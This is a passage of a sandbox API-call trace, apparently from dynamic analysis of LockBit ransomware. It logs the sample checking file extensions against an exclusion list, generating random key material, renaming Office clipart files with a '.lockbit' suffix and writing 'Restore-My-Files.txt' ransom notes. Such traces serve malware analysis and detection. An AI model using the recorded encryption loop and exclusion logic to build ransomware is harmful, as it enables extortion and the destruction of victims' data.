(lpString1=".ckp", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.197] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.198] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.198] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF.lockbit") returned 72 [0165.198] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02441_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0165.199] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.199] malloc (_Size=0x40068) returned 0x3f70048 [0165.199] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=12824) returned 1 [0165.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0165.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0165.200] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.206] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.206] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.207] free (_Block=0x1fa2ed8) [0165.207] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.207] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.207] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.207] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02443_.WMF", cAlternateFileName="")) returned 1 [0165.207] lstrcmpiW (lpString1=".", lpString2="NA02443_.WMF") returned -1 [0165.207] lstrcmpiW (lpString1="..", lpString2="NA02443_.WMF") returned -1 [0165.207] PathFindExtensionW (pszPath="NA02443_.WMF") returned=".WMF" [0165.207] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.208] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.209] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02443_.WMF") returned 1 [0165.210] lstrcmpiW (lpString1="ntldr", lpString2="NA02443_.WMF") returned 1 [0165.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02443_.WMF") returned 1 [0165.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02443_.WMF") returned -1 [0165.210] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02443_.WMF") returned -1 [0165.210] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02443_.WMF") returned 1 [0165.210] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02443_.WMF") returned -1 [0165.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF") returned=".WMF" [0165.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.212] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.212] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.212] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF.lockbit") returned 72 [0165.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02443_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0165.213] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.213] malloc (_Size=0x40068) returned 0x3e70008 [0165.213] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1372) returned 1 [0165.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0165.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0165.214] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0165.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.220] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.220] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.221] free (_Block=0x1fa2ed8) [0165.221] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.221] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.221] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x88c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02444_.WMF", cAlternateFileName="")) returned 1 [0165.221] lstrcmpiW (lpString1=".", lpString2="NA02444_.WMF") returned -1 [0165.222] lstrcmpiW (lpString1="..", lpString2="NA02444_.WMF") returned -1 [0165.222] PathFindExtensionW (pszPath="NA02444_.WMF") returned=".WMF" [0165.222] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.222] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.223] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.223] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02444_.WMF") returned 1 [0165.224] lstrcmpiW (lpString1="ntldr", lpString2="NA02444_.WMF") returned 1 [0165.224] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02444_.WMF") returned 1 [0165.224] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02444_.WMF") returned -1 [0165.224] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02444_.WMF") returned -1 [0165.224] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02444_.WMF") returned 1 [0165.224] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02444_.WMF") returned -1 [0165.224] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.224] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF") returned=".WMF" [0165.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.224] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.224] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.225] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.226] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF.lockbit") returned 72 [0165.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02444_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.227] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.227] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.227] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2188) returned 1 [0165.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.228] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.245] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.245] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.245] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.245] free (_Block=0x1fa2ed8) [0165.245] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.245] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.245] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa34, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02446_.WMF", cAlternateFileName="")) returned 1 [0165.245] lstrcmpiW (lpString1=".", lpString2="NA02446_.WMF") returned -1 [0165.245] lstrcmpiW (lpString1="..", lpString2="NA02446_.WMF") returned -1 [0165.245] PathFindExtensionW (pszPath="NA02446_.WMF") returned=".WMF" [0165.245] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.245] lstrcmpiW (lpString1=".msp", lpString2=".WMF") 